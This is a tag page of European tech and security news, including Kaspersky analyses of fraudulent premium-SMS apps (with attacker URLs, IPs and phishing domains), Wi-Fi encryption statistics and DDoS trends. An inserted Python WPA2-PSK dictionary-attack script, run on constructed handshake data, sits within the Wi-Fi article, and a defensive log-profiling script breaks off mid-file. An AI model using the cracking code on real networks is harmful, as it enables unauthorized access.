
Tag: European countries

Microsoft’s Surface Book and Surface Studio will ship in more markets

Microsoft has been cautious about making its Surface product line available worldwide.
It tests devices in specific markets, sees how they do, and, if the response is good, ships them to those areas. The company appears to have received a strong...

Finalists announced in European IT and Software Excellence Awards 2017

100+ companies from 28 countries represented amongst the finalists. [London, 27 February 2017] The finalists for the European IT & Software Excellence Awards 2017 (www.iteawards.com), the leading pan-European awards for ISVs, Solution Providers and Systems Integrators and their vendor and distributor partners, were announced today by IT Europa.

A total of 61 solution providers, 39 ISVs and 51 suppliers from 28 European countries have made the finals.

The winners will be announced at the... Source: RealWire

Data Protection Certification: Cloud Infrastructure Services Providers operating in Europe declare...

New compliance mark establishes data protection standards and practices to protect customer data and comply with European law. Brussels, 14th February 2017.

The Cloud Infrastructure Services Providers in Europe (CISPE), a coalition of cloud computing lea...

DDoS attacks in Q4 2016

2016 was the year of Distributed Denial of Service (DDoS) with major disruptions in terms of technology, attack scale and impact on our daily life.
In fact, the year ended with massive DDoS attacks on a scale not seen before, leveraging Mirai botnet technology.

Expensive free apps

This post is the result of collaboration between Elevenpaths (Telefónica Cyber Security Unit) and Kaspersky Lab.

Both companies have used their own expertise, researchers and tools, such as Tacyt (an innovative tool for the monitoring and analysis of mobile threats) and GReAT’s internal tools and resources.
Big Brother and Google Play

Fraudulent apps that try to send premium SMS messages or to call high-rate phone numbers are nothing new.

In fact, they are easy to find, especially in Spain, Russia and some other European countries. It is much more interesting to talk about how certain groups bypass detection mechanisms such as those used by Google Play, since this has become difficult to achieve in the past few years. Some years ago it was pretty easy to upload a dialer (or other similar fraudulent app) to Google Play [1] [2], but new detection mechanisms forced attackers to focus on alternative markets, at least for a period of time. Recently, we found a Spanish group that successfully uploaded a non-official app for the Big Brother (Gran Hermano) TV show, one of the most popular TV shows in Spain even after 16 years on the air. [Analysis: cdd254ee6310331a82e96f32901c67c74ae12425] This was not a very sophisticated app, but they were able to get it into Google Play using an old trick.

First, they uploaded a clean, innocuous version that, of course, passed the security controls of Google Play.

Then, some days later, a new version was uploaded with a major feature update, including subscription to paid services.

This trick was extremely simple but successful, since the app stayed in Google Play for around two months (from mid September to mid November 2015). It seems this was not the first time this group tried to upload a Big Brother-like app. We have detected (via Tacyt [3]) at least another four similar applications that, judging by some particular logging messages we found in the code, could have the same origin:

com.granhermano.gh16_1; from 2015-09-15 to 2015-09-22
com.granhermano162; from 2015-09-29 to 2015-11-14
com.granhermanodieciseis; from 2015-09-29 to 2015-11-11
com.granh.gh16_3; from 2015-10-05 to 2015-10-15
com.hisusdk; from 2015-09-16 to 2015-11-14 (the one analyzed)

As we said before, this group was found to be using the specific string "caca" as a logging tag, which is not usual: "caca" is a colloquial Spanish word for excrement (very similar to the word "poo" in English). It can be found in certain testing code, marking lines that should be removed later, but it is unusual to find it in such similar applications and used in the same way.

Because of that, it makes sense to think that those applications were developed by the same group. Other strings and function names used in the code lead us to conclude that those applications were probably developed by native Spanish speakers. This app uses several commercial third-party services, such as Parse.com for the first network communication.

This first API call is used to get all the information necessary to run further actions (URLs, authentication, etc.):

    {
      "results": [
        {
          "Funcionamiento": " Ahora la única pestaña importante es la de VOT.",
          "action1": "http://tempuri.org/getPinCode",
          "action2": "http://tempuri.org/crearSubscripcion",
          "activa": "si",
          "createdAt": "2015-09-08T16:17:24.550Z",
          "estado": true,
          "id_categoria": "2608",
          "id_subscripcion": "400",
          "metodo1": "getPinCode",
          "metodo2": "crearSubscripcion",
          "namespace": "http://tempuri.org/",
          "nombreApp": "GH16 – españa",
          "numero_corto": "795059",
          "numero_sms": "+34911067088",
          "objectId": "tNREzkEocZ",
          "password": "15xw7v7u",
          "updatedAt": "2015-11-27T10:28:00.406Z",
          "url": "http://ws.alertas.aplicacionesmonsan.net/WebSubscription.asmx?WSDL",
          "urlcode": "http://spamea.me/getcode.php?code=",
          "usuario": "yourmob",
          "vot": true
        }
      ]
    }

(The "Funcionamiento" value is Spanish for "Operation: now the only important tab is the VOT [vote] one".) As we can see above, it references different URLs: spamea.me is a service that no longer exists at the time of writing, but it used to be hosted on 107.6.184.212, which seems to be a hosting service shared with many other websites. ws.alertas.aplicacionesmonsan.net is a legitimate service focused on mobile monetization, including premium SMS and direct carrier billing.
It is used from the app to subscribe the user to a service called "yourmob.com". Of course, using paid services is not malicious in itself, since it is legitimate for companies to bill for their services, but the user should be clearly informed about the service cost and conditions beforehand. Although we found a reference to "Terms and Conditions" (in Spanish) pointing to the website servimob.com, we could not verify that this information is shown to users and, in any case, users do not get the opportunity to reject the agreement and avoid being subscribed.

Presence outside Google Play

It makes sense that if a group has managed to get this kind of app into Google Play, they would try something similar through other app sources (thanks to Facundo J. Sánchez, who spotted this). Analysis: 9b47070e65f81d253c2452edc5a0eb9cd17447f4 This app worked slightly differently.
It uses other third-party services and it sends premium SMSs for monetization.

They got from the server what number to use, for how many seconds, and whether the screen should be on or off. We found that they used very similar words for comments and method names (most of them in Spanish, including "caca"), the same topic (Big Brother), references to "yourmob" and much more, so we can definitely link it with the Spanish group mentioned before. One of the web services used by this application (http://104.238.188.38/806/) exposed a control panel showing information about people using this app. As you probably know, groups developing this kind of app usually reuse their servers and supporting infrastructure for multiple apps, for example this one: https://www.virustotal.com/en-gb/file/cc2895442fce0145731b8e448d57e343d17ca0d4491b7fd452e6b9aaa4c2508a/analysis/ It was using this VPS as well: http://vps237553.ovh.net.
Some of the panels and services provided by the VPS were located here:

http://vps237553.ovh.net/nexmo/getcode.php?code=
http://vps237553.ovh.net/polonia/autodirect1.php
http://vps237553.ovh.net/polonia/autodirect2.php
http://vps237553.ovh.net/polonia/guardar_instalacion.php
http://vps237553.ovh.net/polonia/guardar_numero.php
http://vps237553.ovh.net/polonia/guardar_numero.php?androidID=
http://vps237553.ovh.net/polonia/guardar_sms.php
http://vps237553.ovh.net/polonia/push_recibido.php
http://vps237553.ovh.net/polonia/panel.php
http://vps237553.ovh.net/nexmo/

As we can see in their control panel, they have been quite successful in terms of spread, since there are registered phones from many different countries (Spain, the Netherlands, Poland, etc.). In addition, an iterative search on terms such as IP addresses, unique paths, etc. has shown that other apps could be using the same supporting infrastructure shown above, including the following IP addresses and domain names:

In particular, 45.32.236.127 was pointed to by different domain names in the past months:

kongwholesaler.tk (2016-05-22)
acc-facebook.com (2016-04-11)
h-instagram.com (2016-04-11)
msg-vk.com (2016-04-11)
msg-google.ru (2016-04-10)
msg-mail.ru (2016-04-10)
iwantbitcoins.xyz (2015-11-04)

These domains have probably been used for fraudulent initiatives such as phishing attacks, since they are very similar to well-known and legitimate services. Something that caught our attention was that "vps237553.ovh.net", used by a sample and resolving to 51.255.199.164, was also used at some point (June 2016 according to our passive DNS) by the "servimob.com" domain (the same domain referenced in the app from Google Play).

Back to Google Play

As you can imagine, they tried again to upload new apps to Google Play, following a similar philosophy and techniques to those we have seen before.

e49faf379b827ee8d3a777e69f3f9bd3e559ba03
11a131c23e6427dd7e0e47280dd8f421febdc4f7

These apps were available in Google Play for a few weeks in September 2016, using similar techniques, especially to those of the applications we found outside Google Play.

Conclusions

This Spanish group has been quite successful at uploading this kind of app to Google Play, using interesting topics such as the Big Brother TV show.
Spain and Poland have been two countries traditionally targeted by SMS scams and similar malware. However, we have not seen in the past few years any group that was able to upload apps to legitimate markets in such an easy way. Perhaps the key point is that they try to stay close enough to the border between a legitimate business and a malicious one.

Cybersecurity Expert Links Taiwan And Europe ATM Hacks

Group-IB says both attacks were likely carried out by the Cobalt group using the "ATM spitter" malware. Cybersecurity firm Group-IB has linked the July Taiwan ATM cyber heist to the ATM hacking spree in Europe last year, claiming the two were carried out by the same hacking group, dubbed Cobalt. Reuters reports that Group-IB's conclusion is based on the fact that the hacking techniques used in both incidents matched. A group of 22 foreign nationals are alleged to be behind the First Commercial Bank ATM hack in Taiwan, of which three Eastern Europeans are in custody. Most of the stolen money was recovered, and Taiwanese authorities believe the bank network was breached at a London branch. According to a Group-IB report, the hackers used the "ATM spitter" malware in the Taiwan attack as well as in similar hacks carried out in Britain, Russia, Poland, Spain, Bulgaria and many other European countries, Reuters adds.


Intel chiefs “even more resolute” on Russian election meddling findings

[Photo caption: (L-R) Defense Undersecretary for Intelligence Marcell Lettre II, Director of National Intelligence James Clapper, and United States Cyber Command and National Security Agency Director Admiral Michael Rogers testify before the Senate Armed Services Committee. Chip Somodevilla / Getty Images]

In a hearing before the Senate Armed Services Committee, a regularly scheduled unclassified briefing on "foreign cyber threats", Director of National Intelligence James Clapper did very little to preview a report on Russian "cyber" activities around the US elections scheduled to be delivered to President Barack Obama this week.

Clapper did say that an unclassified version of the report would be released to the public early next week. However, that version is unlikely to contain any new specific evidence to support the intelligence community's assertions that the Russian government directed hacking and propaganda operations against Hillary Clinton and the Democratic Party in an attempt to deliberately affect the outcome of the US election. "We plan to brief the Congress and release an unclassified version of this report early next week, with due deference to the protection of highly fragile sources and methods," Clapper said in his opening statement. "We have invested billions, and we put people's lives at risk to get such information.
If we were to expose how we got this, we could just kiss that off. We're going to be as forthcoming as possible." Clapper and National Security Agency Director Admiral Michael Rogers both asserted, however, that the intelligence community was even more certain of Putin's involvement in the meddling in the US election than they were when the Department of Homeland Security (DHS) and the Office of the Director of National Intelligence issued a joint statement in October. "We stand more resolutely now on that statement than we did on the seventh of October," Clapper said. While Clapper said it was almost certain that no votes had been changed by hacking, he noted there was no way to determine the full impact of Russia's information campaign on voters' opinions—"We in the Intelligence Community can't tally that." Much of what Clapper and Rogers said in their testimony echoes data already available from commercial security firms and other sources, as well as the somewhat limited data shared in the DHS-FBI "joint analysis report" (JAR) issued last week.

The report to be delivered to the president will, however, take in the whole of the alleged Russian campaign to influence the election, including the use of Russian state-funded media, social media, and "fake news" to spread disinformation.

The report will likely also include specific data on how the intelligence community linked Putin to the sharing of breached data from the Democratic National Committee and others (including Clinton Campaign Chairman John Podesta) to Wikileaks. In response to a question from the committee on the role of "fake news" disinformation in Russia's election meddling, Clapper said, "Without getting too far in front of the headlights of [the upcoming report], this was a multifaceted campaign—the hacking was only one part of it.
It also entailed classical propaganda, disinformation, and fake news." Clapper acknowledged that the same sort of campaign was ongoing in Europe now, around the upcoming French and German elections. That mirrors forensic evidence that Ars has examined recently in our attempts to connect the dots between operations from the organization behind the "Fancy Bear" group of malware, tools and infrastructure used in the DNC, Democratic Congressional Campaign Committee, and Clinton campaign breaches, and the theft of data from the World Anti-Doping Agency (WADA).
Servers used in connection with some of the spear-phishing attacks connected to these breaches have also been used to target French Gmail users recently. (More details of that activity and how it is connected to the information campaign against the Democrats in the US elections are being pulled together for an upcoming Ars report.) Many of the senators from both parties on the Armed Services Committee, including Sen. John McCain (R-Ariz.) and Sen. Lindsey Graham (R-S.C.), threw barbs at President-elect Donald Trump for his treatment of the intelligence community and his posts apparently professing greater trust in Julian Assange than in US intelligence.

Citing Assange as "the one responsible for publishing the names of people who worked for us" in Iraq and Afghanistan plus the subject of a criminal investigation, McCain asked Clapper and Rogers, "Do you think there's any credibility that we should attach to his statements?" Clapper replied frankly: "Not in my view." For his part, Donald Trump tried to back away from the appearance of endorsing Assange via Twitter: "The dishonest media likes saying that I am in Agreement with Julian Assange - wrong.
I simply state what he states, it is for the people.... to make up their own minds as to the truth.

The media lies to make it look like I am against "Intelligence" when in fact I am a big fan!" Graham was particularly angry at Trump for being overly critical and disrespectful of the intelligence community. "You don't want to undermine those people serving in this arena," he said. He also suggested Obama's sanctions against Russia amounted to "throwing pebbles" when it was time to "throw rocks," because the active campaign to interfere in the US election went far beyond passive espionage. Graham noted that Republicans should be concerned that someone else might do the same thing to them if Trump were to take on China or Iran, and that the response to the Russian information operations was an opportunity to deter future interference in the democratic process. "It's not like we're so much better at cyber security than Democrats," he said. Another area Graham focused on was the US Information Agency (USIA), the now-defunct government body that once ran US public diplomacy and overseas broadcasting, and other US foreign information operations. He suggested this agency was too archaic in its focus on broadcasting.

Clapper agreed, saying in his closing remarks that what was needed to counter information warfare was a "USIA on steroids"—a new information organization that could take on misinformation from adversaries more aggressively in social media and other places online as well as in the broadcast realm. Russia has used the state-funded RT broadcast service and other outlets to more aggressively spread its version of the global narrative over the past few years.

The country has reportedly even used "troll factories" to create confusion and support nationalist populism in several European countries.

Germany warns Moscow will splash cash on pre-election propaganda and misinformation...

Top security agency issues warning ahead of 2017 poll

Germany's intelligence agency has accused Russia of hacking its politicians and election systems under the guise of online activism. Federal Office for the Protection of the Constitution (BfV) chief Hans-Georg Maassen says Russia is intending to "weaken or destabilise the Federal Republic of Germany". Germany's national election is expected in September 2017. Maassen says Russia is pouring money into misinformation campaigns alongside "aggressive and elevated" spying against "German Government officials, members of parliament, and employees of democratic parties". The BfV head says in a statement (PDF in German) that the Government is expecting more hacking in the run-up to the elections. He says Russia has "enormous resources" and noted increased activity by known advanced hacking groups including Pawn Storm (Fancy Bear), said to be a state-sponsored entity. Maassen says citizens' reliance on social media makes them vulnerable to consuming fake news propaganda, which he says is an "ideal gateway" for disinformation using bots to spread messages. It comes as US intelligence agencies accused Moscow of hacking and leaking information to deliberately discredit Democratic presidential candidate Hillary Clinton, and of compromising but withholding data stolen from the Republican National Committee. President-elect Donald Trump has rejected the "high confidence" assessment by the intelligence agencies. Russia has hit back, with Dmitry Peskov, a spokesman for president Vladimir Putin, saying last month that the nation is also bracing for attacks during its next election, and adding that Germany, like all other European countries, hacks other nations' infrastructure. Moscow has been blamed for the hacking and release of Democratic National Committee emails before the US presidential election.

But Moscow has strongly denied involvement in orchestrating cyberattacks on foreign soil and has hit back with allegations of its own against the West.

Research on unsecured Wi-Fi networks across the world

The very nature of wireless Wi-Fi networks means that hackers or criminals simply need to be located near an access point in order to eavesdrop and intercept network traffic. Poorly configured access point encryption or services that allow data to be sent without any encryption pose a serious threat to user data. Confidential data can be protected by encrypting traffic at wireless access points.
In fact, this method of protection is now considered essential for all Wi-Fi networks.

But what actually happens in practice? Is traffic always encrypted on public Wi-Fi networks? How does the situation differ from country to country? Kaspersky Security Network statistics can answer all these questions. We compared the situation with Wi-Fi traffic encryption in different countries using data from our threat database. We counted the number of reliable and unreliable networks in each country that has more than 10 thousand access points known to us (this obviously excludes Antarctica and other regions where there is not enough data to draw any conclusions).

Security of Wireless Networks

Using statistics from Kaspersky Security Network (KSN), we analyzed data from across the world for almost 32 million Wi-Fi hotspots accessed by the wireless adapters of KSN users.

[Chart: Encryption type used in public Wi-Fi hotspots across the world]

Approximately 24.7% of Wi-Fi hotspots in the world do not use any encryption at all.

This means that anyone within radio range of the access point, equipped with nothing more than a Wi-Fi adapter able to receive on the 2.4 GHz (or 5 GHz) band in monitor mode, can capture and store all user traffic and then browse it for data they are interested in.

Fortunately, modern online banking systems and messengers encrypt their own traffic (TLS), so an open network does not expose them directly.

But that application-layer encryption is the only thing standing between users of unencrypted Wi-Fi and the disclosure of their passwords and other sensitive data; anything sent over plain HTTP or another cleartext protocol is readable to the eavesdropper. The WEP (Wired Equivalent Privacy) protocol for encryption of data transferred over Wi-Fi is used by approximately 3.1% of all analyzed access points.

The protocol was the first to be created, quite a long time ago, and is now completely unreliable: recovering a WEP key takes an attacker just a few minutes of captured traffic.

From a data security point of view, using WEP is not much different from using open networks.

This protocol is being relegated to oblivion everywhere, but as we see from the chart above, it can still be found in use.

Around three-quarters of all access points use encryption based on the Wi-Fi Protected Access (WPA) protocol family.

The protocols from this family are currently the most secure.

The effort required to hack WPA depends on its settings, including the complexity of the password set by the hotspot owner.
It is worth noting that an attempt to decrypt traffic from "personal" (WPA-Personal, PSK authentication) wireless networks, including public access points with a shared password, can be made by capturing the four-way handshake between the access point and the device at the beginning of the session: the handshake contains enough material to test passphrase guesses offline, without further contact with the network. "Enterprise" versions are protected from this sort of attack because each client authenticates through the organisation's authentication server (802.1X/EAP) and receives its own session key, so there is no shared passphrase to guess. When it comes to "personal" WPA2 attacks, the situation is similar to that of WPA and mostly depends on the strength of the password set by the hotspot owner. It is only fair to note that during a standard attack on a Wi-Fi access point, a personal computer can test on the order of 50 to 300 keys per second on average (each guess costs a PBKDF2 run of 4096 HMAC-SHA1 iterations; dedicated GPU crackers are considerably faster).
If the passphrase is strong, it will take years to recover it.
Still, no one can guarantee that the key used at a cafe is strong or that the attacker has nothing but a PC at their disposal. Overall, it can be said that today's WPA/WPA2 "non-enterprise" versions are reasonably, but not absolutely, secure.
In particular, they are exposed to offline brute-force and dictionary attacks on the passphrase.
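The following added example (it is not code from the Kaspersky article) shows why a captured handshake is enough: it derives the PMK and PTK the way IEEE 802.11i specifies (PBKDF2-HMAC-SHA1 over the SSID, then PRF-512 over the two MAC addresses and nonces), recomputes the EAPOL key MIC for each passphrase guess, and recovers a weak cafe passphrase from a short wordlist. The SSID, MAC addresses, nonces, EAPOL frame bytes, true passphrase and wordlist are all constructed for the demo; the "captured" MIC is computed from them, not taken from a real network.

```python
"""WPA2-PSK offline dictionary attack against a captured four-way handshake.

Added example for this page, not code from the article. All handshake
material below is constructed; only the key-derivation steps follow 802.11i.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MAC addresses and both nonces (each pair in byte order)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (CCMP) key MIC: first 16 bytes of HMAC-SHA1 over the EAPOL frame with the MIC field zeroed."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def mic_matches(candidate: str, hs: dict) -> bool:
    """Does this passphrase guess reproduce the MIC seen in the captured handshake message?"""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]  # KCK = PTK[0:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol_zeroed"]), hs["mic"])


def dictionary_attack(wordlist, hs: dict):
    """Offline guess loop: no further radio contact with the access point is needed."""
    for word in wordlist:
        if mic_matches(word, hs):
            return word
    return None


# --- constructed "capture" (assumed values, not from a real network) ----------
_SSID = "CafeWiFi"
_AP_MAC = bytes.fromhex("001122334455")
_STA_MAC = bytes.fromhex("66778899aabb")
_ANONCE = bytes(range(32))
_SNONCE = bytes(range(32, 64))
# Sketch of EAPOL-Key message 2/4: header, replay counter, SNonce, IV, RSC, ID,
# 16-byte MIC field zeroed, key-data length 0. Exact layout is not what matters here.
_EAPOL_ZEROED = (b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8 + _SNONCE
                 + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
_TRUE_PASSPHRASE = "espresso2016"  # the weak cafe passphrase the attack should recover

HANDSHAKE = {
    "ssid": _SSID, "ap_mac": _AP_MAC, "sta_mac": _STA_MAC,
    "anonce": _ANONCE, "snonce": _SNONCE, "eapol_zeroed": _EAPOL_ZEROED,
    # the MIC the client "sent", computed with the true passphrase when this capture was built
    "mic": eapol_mic(
        derive_ptk(pmk_from_passphrase(_TRUE_PASSPHRASE, _SSID),
                   _AP_MAC, _STA_MAC, _ANONCE, _SNONCE)[:16],
        _EAPOL_ZEROED),
}

WORDLIST = ["password", "12345678", "cafewifi", "latte2016", "espresso2016", "cappuccino"]


def recover_passphrase(wordlist=WORDLIST, hs=HANDSHAKE):
    """Run the dictionary attack against the constructed capture."""
    return dictionary_attack(wordlist, hs)


if __name__ == "__main__":
    print("recovered passphrase:", recover_passphrase())
```

Every guess costs one PBKDF2 run of 4096 HMAC-SHA1 rounds, which is where the keys-per-second figure comes from; a long random passphrase is the only thing that makes the wordlist run out before the attacker does. Enterprise networks do not have this exposure because there is no shared passphrase for the MIC to confirm.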

There are ready-to-use publicly available tools (aircrack-ng and similar software) for performing such attacks, as well as a large number of manuals.

Geography of Unsecured Wi-Fi Access Points

[Chart: Share of Wi-Fi hotspots that use unreliable WEP or do not encrypt data (by country)]

We would like to note that the five countries with the highest proportion of unsecured connections include Korea (47.9% of unsecured Wi-Fi access points), while France (40.14%) and the US (39.31%) rate 9th and 12th respectively in the list. Germany appears to be the most secure among Western European countries, with 84.91% of access points secured by WPA/WPA2 protocol encryption.

[Chart: Share of Wi-Fi hotspots that use WPA/WPA2 (by country)]

However, even when using an encrypted connection, you should not completely rely upon this security measure.

There are several scenarios that could compromise even well-encrypted network traffic.

These include fake access points with names that duplicate or mimic real ones (for example, TrainStation_Free versus TrainStation Free) and compromised routers forwarding traffic unencrypted to attackers (malware that infects such devices is already "in the wild").

At any rate, taking care of your own security is a good idea.

Recommendations for Users

There are several simple rules that help protect personal data when using open Wi-Fi networks in cafes, hotels, airports, and other public places. Do not trust networks that are not password-protected. Even if a network requests a password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection with the same password.

This allows them to easily steal personal user data. You should only trust network names and passwords given to you by employees of the establishment. To maximize your protection, turn off your Wi-Fi connection whenever you are not using it.

This will also save your battery life. We recommend disabling automatic connection to existing Wi-Fi networks too. If you are not 100% sure the wireless network you are using is secure, but you still need to connect to the internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely not perform any online banking operations or enter your bank card details anywhere. To avoid being a target for cybercriminals, you should enable the “Always use a secure connection” (HTTPS) option in your device settings.
It is recommended to enable this option when visiting any websites you think may lack the necessary protection. If possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning criminals won’t be able to read your data, even if they gain access to them. And, of course, you should use dedicated security solutions.

They inform users about any potential dangers when connecting to a suspicious Wi-Fi network and prevent any passwords or other confidential data from being compromised if there is a threat. One example of a dedicated solution is the Secure Connection tool included in the latest versions of Kaspersky Internet Security and Kaspersky Total Security.

This module protects users connected to Wi-Fi networks by providing a secure encrypted connection channel.
Secure Connection can be launched manually or, depending on the settings, activated automatically when connecting to public Wi-Fi networks, when navigating to online banking and payment systems or online stores, and when communicating online (mail services, social networks, etc.).

Kaspersky DDOS intelligence report for Q3 2016

Q3 events

Cybercrime as a Service

In the last few months the scale of the global 'Cybercrime as a Service' infrastructure has been revealed: fully commercialized, with DDoS as one of the most popular services, capable of launching attacks the likes of which have never been seen before in terms of volume and technological complexity. Against this background, Europol published the 2016 Internet Organised Crime Threat Assessment (IOCTA) on 28 September, which is based on the experiences of law enforcement institutions within the EU member states.

The report clearly ranks DDoS in first place as a key threat and states that any "Internet facing entity, regardless of its purpose or business, must consider itself and its resources to be a target for cybercriminals". Most likely, this stems from early September, when Brian Krebs, an industry security expert, published an investigation outlining the business operations of a major global DDoS-for-hire service called vDOS and its principal owners, two young men in Israel.

The culprits have been arrested and investigations are ongoing, but the sheer scale of their business is stunning. Based on a subscription scheme starting from $19.99 per month, tens of thousands of customers paid more than $600,000 over the past two years to vDOS.
In just four months between April and July, vDOS launched more than 277 million seconds of attack time, or approximately 8.81 years' worth of attack traffic. It was no wonder that shortly afterwards a DDoS attack brought down Brian Krebs's website with a traffic volume close to 620 Gbps, making it one of the biggest attacks the Internet has ever witnessed, only to be topped several days later by another attack close to 1 Tbps that hit France's OVH.

The attack vector, as Octave Klaba, CTO at OVH, reported, looks like the same Internet of Things (IoT) botnet, totaling 152,464 devices (mainly webcams, routers and thermostats), that brought down Brian Krebs's website. To make the situation even worse, hackers then released the source code of Mirai, the malware that, according to security experts, was responsible for the aforementioned DDoS attacks.

The code includes a built-in scanner that looks for vulnerable IoT devices and enrolls them into a botnet. With this, we expect to see a new wave of commercial services like vDOS, and of DDoS attacks, in the coming months. The Internet of Things is increasingly becoming a powerful tool for attackers, facilitated by the neglect of information security on the part of both vendors and users. So, check that your Internet-connected devices have a strong security setup.

'Political' DDoS attacks

DDoS is widely used in politics.
In July of this year, an international tribunal stated China’s territorial claims to the Spratly archipelago in the South China Sea were groundless, and almost immediately at least 68 sites belonging to various Philippine government institutions were subjected to powerful DDoS attacks.

The international press called these incidents part of a long-term cyberespionage campaign launched by China in its struggle for sovereignty over the Spratly archipelago.

Attack on a broker

Cybercriminals have identified the most vulnerable targets for DDoS extortion purposes: brokerage companies.

They are high-turnover businesses that are also extremely dependent on web services.

The Taiwanese company First Securities recently received a demand for 50 bitcoins (about $32,000) from unknown persons.

After it refused to pay, the company's website was targeted by a DDoS attack, which made trading impossible for the company's clients. Meanwhile, the president of First Securities released a statement to the press saying they had experienced a "trade slowdown" that only affected some of their investors.

Assessing the damage caused by DDoS attacks

B2B International, at the request of Kaspersky Lab, conducted the study IT Security Risks 2016.

According to the results, corporations are suffering increasing damage from DDoS attacks: a single attack can cost a company more than $1.6 million in losses.

At the same time, 8 out of 10 companies are subjected to several attacks per year.

Trend of the quarter: SSL-based DDoS attacks

According to Kaspersky DDoS Protection, the number of “smart” HTTPS-based DDoS attacks on applications increased in the third quarter of 2016.

These attacks have a number of important advantages that make a successful attack more likely. Establishing a secure connection requires considerable resources, even though cryptographic algorithms keep getting faster (e.g., elliptic curve algorithms have improved encryption performance while maintaining the same cryptographic strength).

For the sake of comparison, a properly configured web server is capable of processing tens of thousands of new HTTP connections per second, but when processing encrypted connections this capacity falls to just hundreds of connections per second. The use of hardware crypto accelerators makes it possible to significantly increase this value. However, this doesn’t help much considering the current reality of cheap and readily available rented servers, high-capacity communication channels, as well as known vulnerabilities that allow cybercriminals to build larger botnets.

They can carry out a successful DDoS attack by creating a load that exceeds the performance of expensive hardware solutions. A typical example of a “smart” attack is a relatively small number of queries being sent to the “load-heavy” parts of websites (as a rule, search forms are chosen) inside a small number of encrypted connections.

Those requests are almost invisible in the overall traffic flow, and at a low intensity they are often very effective.

At the same time, decryption and analysis of traffic is only possible on the web-server side. Encryption also complicates the operation of specialized systems designed to protect against DDoS attacks (especially solutions used by communications providers).

Decrypting traffic on-the-fly in order to analyze the content of network packets is often not possible during such attacks due to technical or security reasons (it’s not permitted to pass a server’s private key to third-party organizations, mathematical limitations prevent access to the information in encrypted packets in transit traffic).

This significantly reduces the effectiveness of protection against such attacks. The growing proportion of “smart” DDoS attacks is caused in no small part by the fact that amplification-type attacks, the most popular attack type in recent times, are becoming increasingly difficult to implement. On the Internet, the number of vulnerable servers that can be used to organize such attacks is steadily falling.
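The “smart” HTTPS attack described above is hard to see in volume terms for two reasons the text gives: the origin server is the only place where the plaintext of a request is visible, and what exhausts the server is the cost of each request, not the count. The Python below is an added example, not code from the report or from any Kaspersky product: it profiles clients from the server’s own access log by cumulative upstream response time rather than by request count. The log layout (client, request line, status, bytes, upstream time in ms), the endpoint names and the threshold values are assumptions, and the log lines are constructed.

```python
"""Cost-weighted client profiling for spotting low-rate, resource-heavy
request patterns in a TLS-terminating web server's own access log.

Added example; not code from the report or from Kaspersky Lab. The log
field layout is an assumption about how the server is configured to log,
and the sample lines are constructed.
"""
import re
from collections import defaultdict
from typing import NamedTuple

# One log line: client IP, quoted request line, status, bytes, upstream ms.
# (Layout is assumed; adapt the regex to your server's log format.)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$'
)


class ClientProfile(NamedTuple):
    ip: str
    requests: int
    request_share: float   # fraction of all requests sent by this client
    cost_share: float      # fraction of total server time spent on this client


def _constructed_log() -> list:
    """Constructed sample: four ordinary visitors fetching cheap static pages,
    plus one client issuing a handful of expensive search queries at a rate
    that would never trip a request-count threshold."""
    lines = []
    for ip in ("198.51.100.7", "198.51.100.8", "198.51.100.9", "198.51.100.10"):
        for n in range(10):
            lines.append(f'{ip} "GET /static/page{n}.html HTTP/1.1" 200 4096 10')
    for q in ("a+b+c+d", "x+y+z", "foo+bar"):
        lines.append(f'203.0.113.10 "GET /search?q={q} HTTP/1.1" 200 18000 2000')
    return lines


SAMPLE_LOG = _constructed_log()


def parse_line(line: str) -> dict:
    """Split one access-log line into its fields; numeric fields become ints."""
    m = LINE_RE.match(line)
    if m is None:
        raise ValueError(f"unparseable log line: {line!r}")
    rec = m.groupdict()
    for key in ("status", "bytes", "ms"):
        rec[key] = int(rec[key])
    return rec


def profile_clients(lines) -> list:
    """Aggregate request count and cumulative upstream time per client and
    express both as shares of the window totals."""
    count = defaultdict(int)
    cost = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        count[rec["ip"]] += 1
        cost[rec["ip"]] += rec["ms"]
    total_req = sum(count.values())
    total_ms = sum(cost.values()) or 1
    return [
        ClientProfile(ip, count[ip], count[ip] / total_req, cost[ip] / total_ms)
        for ip in count
    ]


def flag_suspects(lines, min_cost_share=0.2, ratio=5.0) -> list:
    """Flag clients whose share of server time is large in absolute terms and
    far out of proportion to their share of requests (thresholds assumed)."""
    return sorted(
        (p for p in profile_clients(lines)
         if p.cost_share >= min_cost_share
         and p.cost_share / p.request_share >= ratio),
        key=lambda p: p.cost_share, reverse=True,
    )


def top_talker(lines) -> str:
    """The client with the most requests: what a volume-based filter sees."""
    return max(profile_clients(lines), key=lambda p: p.requests).ip


if __name__ == "__main__":
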